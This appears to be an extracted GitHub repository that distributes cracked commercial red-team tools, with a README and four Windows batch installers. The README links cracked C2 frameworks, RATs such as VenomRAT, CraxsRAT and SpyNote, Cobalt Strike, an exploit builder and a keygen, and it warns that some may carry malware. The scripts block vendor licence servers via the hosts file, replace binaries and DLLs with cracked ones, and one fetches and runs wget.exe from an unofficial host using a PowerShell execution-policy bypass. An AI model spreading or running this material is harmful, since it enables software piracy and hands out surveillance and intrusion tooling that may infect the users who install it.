Repository: Ixve/Red-Team-Tools
Branch: main
Commit: 4e7c0f45189e
Files: 5
Total size: 23.6 KB
Directory structure:
gitextract__pfk93l0/
├── README.md
├── acunetix_installer_windows.bat
├── burpsuite_installer_windows.bat
├── hclappscan_installer_windows.bat
└── specterinsight_installer_windows.bat
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# ⚠️ WARNING ⚠️
As of 1/27/2024 these tools will not be checked for malware using any sort of environment, you are responsible for any damages done to your computer, run these strictly in a VM environment.<br><br>Make sure to read notes at the bottom before opening any issue.<br>Moved from gofile.io to pixeldrain.com (05/11/2025) - enjoy!
# Cracked Red Teaming Tools.
This is a full collection of red teaming tools which have been cracked by other people, if you need me to find anything, let me know via the issues tab.
<br><br>
### ℹ Sandboxes ℹ
Sandboxing is useful when it comes to testing whether or not the tools contain malware, and it is *strongly* recommended to do so depending on the tool size.
| Name | Link | Description |
| :--- | ---- | ---: |
| AnyRun | [any.run](https://app.any.run/) | A (mostly) free online interactive VM/sandbox, one of the best out there, requires business e-mail, however limited to 5 minutes per sample including a 16MB sample size (Bypassable up to 100-300MB) for free tier accounts |
| TRIAGE | [tria.ge](https://tria.ge/) | A completely free online interactive VM/sandbox, less informative compared to AnyRun, however it needs just a singular log in using any email or even GitHub, with up to a 30-minute sample time limit and no sample size limit. |
| HybridAnalysis | [hybrid-analysis.com](https://hybrid-analysis.com/) | A completely (login-)free online sandbox, unlike the others it is not interactive, has a 100MB file size limit and has a very long queue to get your file analyzed. |
| JoeSandbox | [joesandbox.com](https://www.joesandbox.com/) | Appears to be a fully interactive online VM/sandbox with a 100MB file size limit, however I have never personally used it. |
| CUCKOO | [cuckoo.cert.ee](https://cuckoo.cert.ee/) | A non-interactive completely (login-)free online sandbox, appears to have no file size limit and I have rarely used it personally. |
### 🐀 C2/RATs 🐀
##### Windows/Linux (W - Windows , L - Linux)
| Tool | Link |
| :--- | ---: |
| [W/L] Cobalt Strike v4.9.1 | [Download](https://gofile.io/d/U25hhJ) |
| [L] Brute-Ratel v1.4.5 (Blitzkrieg) | [Missing File](https://github.com/ixve/red-team-tools/) |
| [W] SpecterInsightC2 | [Download](https://pixeldrain.com/u/WyYAazhY) |
| [W] VenomRAT v6.0.1 | [Download](https://pixeldrain.com/u/xVXeWbWb) |
##### Android
| Tool | Link |
| :--- | ---: |
| CraxsRAT v6? (⚠️ **READ NOTES** ⚠️) | [Download](https://pixeldrain.com/u/e3MdYXM7) |
| SpyNote v7.3.1 (❓ **READ NOTES** ❓) | [DOWN - Updated link may not come]() |
<br><br>
### 🎭 Exploitation Toolkits/Software 🎭
###### Windows
| Tool | Link |
| :--- | ---: |
| Immunity CANVAS v7.27 | [Download](https://pixeldrain.com/u/u8SeCmNe) |
| Quantum .lnk Exploit Builder (02-10-22) | [Download](https://pixeldrain.com/u/9zjpYNQn) |
| JexBot v1.0 (READ NOTES) | [Download](https://pixeldrain.com/u/Ea8kF2Hh) |
| MetaSploit Pro | [Download](https://pixeldrain.com/u/u12Nsuzm) |
###### Linux
| Tool | Link |
| :--- | ---: |
| MetaSploit Pro | [Download](https://pixeldrain.com/u/xS54Uxwa) |
<br><br>
### 🌐 Web App Security Tools 🌐
##### Windows
| Tool | Link |
| :--- | ---: |
| Invicti Pro v25.5 | [Download](https://pixeldrain.com/u/qZyTDWMc) |
| Burp Suite PRO v2023.12.1 ([Install Script](https://github.com/Ixve/Red-Team-Tools/blob/main/burpsuite_installer_windows.bat)) | [Download](https://pixeldrain.com/u/rWEidrKW) |
| Acunetix v25.1.250204093 ([Install Script](https://github.com/Ixve/Red-Team-Tools/blob/main/acunetix_installer_windows.bat)) | [Download](https://pixeldrain.com/u/xTAiTMEg) |
| Xray Pro v1.9.11 | [Download](https://pixeldrain.com/u/nHdXB2Uk) |
| Super-Xray v1.7 | [Download](https://pixeldrain.com/u/GWa47ATW)
| HCL AppScan Standard v10.6.0.28408 | [Download](https://pixeldrain.com/u/dq6kxyik) |
| Nessus Professional v10.6.0 | [Download](https://pixeldrain.com/u/afUHRhXF) |
##### Linux
| Tool | Link |
| :--- | ---: |
| Acunetix v25.1.250204093 | [Download](https://pixeldrain.com/u/CaagbhPL) |
| Xray Pro v1.9.11 | [Download](https://pixeldrain.com/u/4m3c84ht) |
| Nessus Professional v10.5.4 | [Download (BASH SCRIPT)](https://cyberarsenal.org/zen/nessus_debian_only_not_for_ubuntu_latest.sh) |
<br><br>
### 🕷️ Debugging / Decompilation Tools 🕷️
| Tool | Link |
| :--- | ---: |
| IDA v9.1_250226 Keygen | [Download](https://gofile.io/d/MOgQCb) |
<br><br>
# 📝 Notes 📝
###### General
Most of these tools are obtained from [CyberArsenal](https://cyberarsenal.org/) and [xss.is](https://xss.is/), credits for the cracks go to them.
Everything is re-uploaded to gofile.io due to speed issues with the pwn3rzs CDN (presumably overloaded), including the removal of archive passwords (unless I suspect there is malware, in which case they're password protected)
###### Brute-Ratel
This version is fully untested - no idea if it is broken or not.
The xmodlib file is cleared every start-up, including a license check being present every time you start Brute-Ratel.
Again, if it fails to compile the `badger.bin` payload into a executable, run the following: <br>
`cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe`
###### CraxsRat V6(?)
High possibility of malware, run **strictly** in a virtual environment. I am not responsible for any damages caused to your host machine if you run it outside a VM.
Archive password: `suspicious`
###### JexBot
1. Run `add_hosts.bat` **as Administrator**
2. Run `Jex_crack.exe` then `JEX BOT.exe`
3. Put `mastercho` as the user/password combo
Note: After logging into jexbot you can close `Jex_crack.exe`, however you will need to run `Jex_crack.exe` every time you want to run jexbot.
###### Acunetix / Burp Suite
The install scripts are untested for the latest versions. If required, open a issue and I'll update the scripts.
###### SpyNote
I may not be re-uploading SpyNote due to it's **extreme** sketchiness.<br>
I will *not* be responsible for possible machine infections due to uneducated users running mindlessly.<br>
If you wish to contribute a safe, updated link, feel free to open an issue.
###### Xray
For Windows:<br>
Open a command prompt (or powershell if you prefer that), run scans as follows:<br>
`xray.exe ws --browser http://testphp.vulnweb.com --json-output testphp.json --html-output testphp.html`
For Linux:<br>
Open a terminal, run scans as follows:<br>
`./xray ws --browser http://testphp.vulnweb.com --html-output testphp.html`
Without rad/chrome:
`./xray ws --basic http://testphp.vulnweb.com --html-output testphp.html`
Missing Chrome "fix" (for using xray+rad): <br>
`sudo apt update` <br>
`wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb` <br>
`sudo apt install ./google-chrome-stable_current_amd64.deb` <br>
Go to the launch script to insert `--no-sandbox` (e.g. `/opt/google/chrome/google-chrome`) <br>
Last line of the file should look like this: <br>
`exec -a "$0" "$HERE/chrome" --no-sandbox "$@"`
###### Invicti Professional
1. Import the registry file so the knowledgebase properly renders<br>
2. Run `NetSparker.exe`<br>
3. Optional: Disable telemetry, system proxy, enable dark mode, etc
###### HCL AppScan Standard
**Make sure to replace the DLLs with the cracked ones**
###### To be added:
- de4dot (pre-compiled)
- AppSpider Full
- HTTP Debugger Pro
- Glasswire Elite
- Anything suggested in the issues tab (Nothing, for now)
================================================
FILE: acunetix_installer_windows.bat
================================================
@REM Acunetix Windows installer script made by ixve for Red-Team-Tools
echo off
cls
cls
echo.&&echo.
echo ^[0^/7^] Checking for Administrator rights...
mkdir "%windir%\system32\test" 1>nul2>nul
if "%errorlevel%" == "0" (
rmdir "%windir%\system32\test" & echo User is Administrator, continuing
) else (
echo User is not Administrator, please re-run script as admin. && pause && exit /b 1
)
cls
echo.&&echo.
echo ^[1^/7^] Adding entries to hosts file
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 erp.acunetix.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 erp.acunetix.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 erp.acunetix.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 erp.acunetix.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 discovery-service.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 discovery-service.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 discovery-service.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 discovery-service.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 cdn.pendo.io
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 cdn.pendo.io.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 cdn.pendo.io
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 cdn.pendo.io.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 bxss.me
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 bxss.me.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 bxss.me
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 bxss.me.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 jwtsigner.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 jwtsigner.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 jwtsigner.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 jwtsigner.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 sca.acunetix.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 sca.acunetix.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 sca.acunetix.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 sca.acunetix.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 192.178.49.174 telemetry.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 192.178.49.174 telemetry.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 2607:f8b0:402a:80a::200e telemetry.invicti.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 2607:f8b0:402a:80a::200e telemetry.invicti.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
cls
echo.&&echo.
echo ^[2^/7^] Running Acunetix installer, please make sure to install to the default directory.
start /wait acunetix_25.8.250820089.exe 1>nul2>nul
cls
echo.&&echo.
echo ^[3^/7^] Stopping Acunetix services
net stop "Acunetix" 1>nul2>nul
net stop "Acunetix Database" 1>nul2>nul
cls
echo.&&echo.
echo ^[4^/7^] Removing wvsc file in default Acunetix install directory
del "C:\Program Files (x86)\Acunetix\25.8.250820089\wvsc.exe" 1>nul2>nul
echo Moving patched wvsc file to default Acunetix install directory
move wvsc.exe "C:\Program Files (x86)\Acunetix\25.8.250820089\" 1>nul2>nul
cls
echo.&&echo.
echo ^[5^/7^] Removing Acunetix license directory
rmdir /s /q C:\ProgramData\Acunetix\shared\license\ 1>nul2>nul
echo Re-making Acunetix license directory
mkdir C:\ProgramData\Acunetix\shared\license 1>nul2>nul
echo Moving license_info.json and wa_data.dat to Acunetix license directory
move license_info.json C:\ProgramData\Acunetix\shared\license\ 1>nul2>nul
move wa_data.dat C:\ProgramData\Acunetix\shared\license\ 1>nul2>nul
echo Setting license_info.json and wa_data.dat as read-only
attrib +r C:\ProgramData\Acunetix\shared\license\*.* /s
cls
echo.&&echo.
echo ^[6^/7^] Re-starting Acunetix services
net start "Acunetix" 1>nul2>nul
net start "Acunetix Database" 1>nul2>nul
cls
echo.&&echo.
echo ^[7^/7^] Opening Acunetix dashboard
start https://127.0.0.1:3443
cls
echo.&&echo.
echo Work complete, enjoy your Acunetix install
timeout 5
exit /b 1
================================================
FILE: burpsuite_installer_windows.bat
================================================
echo off
title B.S.I.H.
cls
echo Welcome to B.S.I.H. (Burp Suite Install Helper)
echo.
echo.
REM Getting wget.exe using PowerShell "LOLBAS" (Alternative to BitsAdmin)
echo Grabbing wget.exe via PowerShell.
powershell -exec bypass -command "Import-Module BitsTransfer; Start-BitsTransfer 'https://hyperos-script-store.pages.dev/wget.exe' 'wget.exe'"
cls
REM Checking if user has a proper Java version installed
:javacheck
echo Do you have Java 17+ installed?
echo [1] Yes
echo [2] Check (Attempts to run "java -version")
echo [0] No
echo.
choice /c 120 /n /m ">> "
if %ERRORLEVEL%==1 cls
if %ERRORLEVEL%==2 cls && start cmd /k "java -version && pause && exit" && goto javacheck
if %ERRORLEVEL%==3 (
cls
echo Downloading OpenJDK 21
wget.exe --no-check-certificate -q --show-progress -O OpenJDK.msi "https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.2+13/OpenJDK21U-jdk_x64_windows_hotspot_21.0.2_13.msi"
echo.
echo Installing OpenJDK
msiexec /i OpenJDK.msi /qb! /l*v openjdk_install.log
echo Done
)
cls
REM Grabbing Burp Suite from the official servers and installing with unattended mode
echo Downloading Burp Suite
wget.exe --no-check-certificate -q --show-progress -O BurpSuiteInstaller.exe "https://portswigger-cdn.net/burp/releases/download?product=pro&version=2023.12.1&type=WindowsX64"
echo.
echo Running installer
BurpSuiteInstaller.exe -q -dir 'C:\Program Files\' -overwrite -nofilefailures -splash "Burp Suite Installer" -console
REM Moving and running keygen
cls
echo Copying BurpLoaderKeygen.jar to installed folder
copy BurpLoaderKeygen\BurpLoaderKeygen.jar "C:\Program Files\BurpSuitePro\" 1>nul2>nul
echo Running BurpLoaderKeygen.jar
start java -jar "C:\Program Files\BurpSuitePro\BurpLoaderKeygen.jar"
REM User interaction required
cls
echo.
echo.
REM The blob below is just a warning sign, you can print it yourself in a seperate batch file if you don't trust me
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_
echo.
echo.
echo User interaction is required from this point on
echo You will be guided from the console on what you have to do
pause
pause
cls
echo.
echo.
echo.
echo 1. Run Burp Suite from the keygen by pressing the Run button
echo.
echo 2. Agree to the Burp Suite license agreement
echo.
echo 3. Copy the license from the keygen and paste it into the license text box located inside Burp Suite and press next
echo.
echo 4. Locate and press "Manual Activation", then press "Copy Request"
echo.
echo 5. Tab back into the keygen and paste the request into the text box on the right side
echo.
echo 6. Copy the activation resposne back into Burp Suite, then press Next -^> Finish -^> Next -^> Start Burp
echo.
echo 7. Enjoy.
echo.
echo.
pause
REM Add a starter to the Destkpo
echo ^"C:\Program Files\BurpSuitePro\jre\bin\java.exe^" "--add-opens=java.desktop/javax.swing=ALL-UNNAMED" "--add-opens=java.base/java.lang=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED" "-javaagent:C:/Program Files/BurpSuitePro/BurpLoaderKeygen.jar" "-noverify" "-jar" "C:\Program Files\BurpSuitePro\burpsuite_pro.jar" > %USERPROFILE%\Desktop\StartBurpSuite.bat
REM Removing files that are no longer needed before exitting
echo Deleting extra files
del /q /f wget.exe 2>nul
del /q /f BurpSuiteInstaller.exe 2>nul
del /q /f .wget-hsts 2>nul
del /q /f burpsuite_pro_windows-x64_v2023_12_1_error.log 2>nul
echo Killing java.exe (BurpKeygenLoader.jar)
taskkill /f /im java.exe 1>nul2>nul
REM Finally, exit.
echo Script finished, goodbye.
exit /b 1
================================================
FILE: hclappscan_installer_windows.bat
================================================
@REM Simple HCL AppScan installer - ixve @ github.com/ixve/red-team-tools
echo off
cls
echo.
echo [1/3] Installing HCL AppScan...
start /wait "" HCL_AppScan.exe /S /v/qn 1>nul 2>nul
cls
echo.
echo [2/3] Killing process...
taskkill /F /IM AppScanGUI.exe /T 1>nul 2>nul
cls
echo.
echo [3/3] Patching...
xcopy /Y /I "crack\AppScanSDK.dll" "C:\Program Files (x86)\HCL\AppScan Standard\" 1>nul 2>nul
xcopy /Y /I "crack\HclLicenseProvider.dll" "C:\Program Files (x86)\HCL\AppScan Standard\" 1>nul 2>nul
echo.&&echo.
echo Crack by Pwn3rzs - Zen
echo Enjoy :3
timeout /T 3
exit
================================================
FILE: specterinsight_installer_windows.bat
================================================
@REM SpecterInsight C2 Install Script - ixve @ github.com/ixve/red-team-tools
echo off
setlocal enabledelayedexpansion
cls
echo.
echo ^[1^/5^] cURL check
where curl >nul 2>&1
if %ERRORLEVEL%==0 (
echo [OK] cURL installed
) else (
echo.
echo [ERR] cURL missing
mkdir %TEMP%\curl
echo [1/3] Downloading...
powershell -Command "Invoke-WebRequest -Uri 'https://curl.se/windows/dl-8.17.0_1/curl-8.17.0_1-win64-mingw.zip' -OutFile '%TEMP%\curl\curl.zip' -UseBasicParsing" 1>nul 2>nul
echo [2/3] Extracting...
powershell -Command "Expand-Archive -Path '%TEMP%\curl\curl.zip' -DestinationPath '%TEMP%\curl\' -Force" 1>nul 2>nul
echo [3/3] Moving...
xcopy /Y /I "%TEMP%\curl\curl-8.17.0_1-win64-mingw\bin\curl.exe" "%SYSTEMROOT%\System32\" 1>nul 2>nul
xcopy /Y /I "%TEMP%\curl\curl-8.17.0_1-win64-mingw\bin\curl-ca-bundle.crt" "%SYSTEMROOT%\System32\" 1>nul 2>nul
echo [OK] cURL installed
rmdir /s /q %TEMP%\curl\
echo.
)
cls
echo.
echo ^[2^/5^] Prerequisites check
set POSTGRESQL_FOUND=
set ASPNET_FOUND=
set NETRUN_FOUND=
for /f "tokens=*" %%r in ('dotnet --list-runtimes 2^>nul ^| findstr /r /c:"^Microsoft\.NETCore\.App 9\.0\.10 "' ) do (
set NETRUN_FOUND=1
)
for /f "tokens=*" %%r in ('dotnet --list-runtimes 2^>nul ^| findstr /i "Microsoft.AspNetCore.App"') do (
set ASPNET_FOUND=1
)
for /f "tokens=*" %%K in ('reg query "HKLM\SOFTWARE\PostgreSQL\Installations" 2^>nul') do (
set POSTGRESQL_FOUND=1
)
if defined NETRUN_FOUND (
echo [OK] .NET Runtime v9.0.10 installed
) else (
echo.
echo [ERR] .NET Runtime v9.0.10 missing
echo [1/2] Downloading installer...
curl -k -L -s -o net-runtime.exe "https://builds.dotnet.microsoft.com/dotnet/Runtime/9.0.10/dotnet-runtime-9.0.10-win-x64.exe"
echo [2/2] Installing...
start /wait "" net-runtime.exe /quiet /norestart
echo [OK] .NET Runtime v9.0.10 installed
echo.
)
if defined ASPNET_FOUND (
echo [OK] ASP.NET Core installed
) else (
echo.
echo [ERR] ASP.NET Core missing
echo [1/2] Downloading installer...
curl -k -L -s -o aspnet-core.exe "https://builds.dotnet.microsoft.com/dotnet/aspnetcore/Runtime/9.0.10/aspnetcore-runtime-9.0.10-win-x64.exe"
echo [2/2] Installing...
start /wait "" aspnet-core.exe /quiet /norestart
echo [OK] ASP.NET Core installed
echo.
)
if defined POSTGRESQL_FOUND (
echo [OK] PostgreSQL installed
) else (
echo.
echo [ERR] PostgreSQL missing
echo [1/2] Downloading installer...
curl -k -O -s https://get.enterprisedb.com/postgresql/postgresql-18.0-2-windows-x64.exe
echo [2/2] Installing ^(This might take a while^)...
start /wait "" postgresql-18.0-2-windows-x64.exe --mode unattended --unattendedmodeui none --superpassword "postgres"
echo [OK] PostgreSQL installed
echo.
)
cls
echo.
echo ^[3^/5^] Cleanup
del net-runtime.exe 1>nul 2>nul
del aspnet-core.exe 1>nul 2>nul
del postgresql-18.0-2-windows-x64.exe 1>nul 2>nul
cls
echo.
echo ^[4^/5^] Modifying HOSTS file
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 www.practicalsecurityanalytics.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 www.practicalsecurityanalytics.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 practicalsecurityanalytics.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo 127.0.0.1 practicalsecurityanalytics.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 www.practicalsecurityanalytics.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 www.practicalsecurityanalytics.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 practicalsecurityanalytics.com
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo ::1 practicalsecurityanalytics.com.
>> "%SYSTEMROOT%\System32\drivers\etc\hosts" echo.
cls
echo.
echo ^[5^/5^] Starting server and client
start SpecterInsight\server\SpecterInsight.Server.Host.exe 1>nul 2>nul
start SpecterInsight\client\SpecterInsight.UI.exe
cls
echo.
echo.
echo Work complete, enjoy ^:3
timeout /T 5
exit
gitextract__pfk93l0/ ├── README.md ├── acunetix_installer_windows.bat ├── burpsuite_installer_windows.bat ├── hclappscan_installer_windows.bat └── specterinsight_installer_windows.bat
Condensed preview — 5 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (25K chars).
[
{
"path": "README.md",
"chars": 7383,
"preview": "# ⚠️ WARNING ⚠️\nAs of 1/27/2024 these tools will not be checked for malware using any sort of environment, you are respo"
},
{
"path": "acunetix_installer_windows.bat",
"chars": 4538,
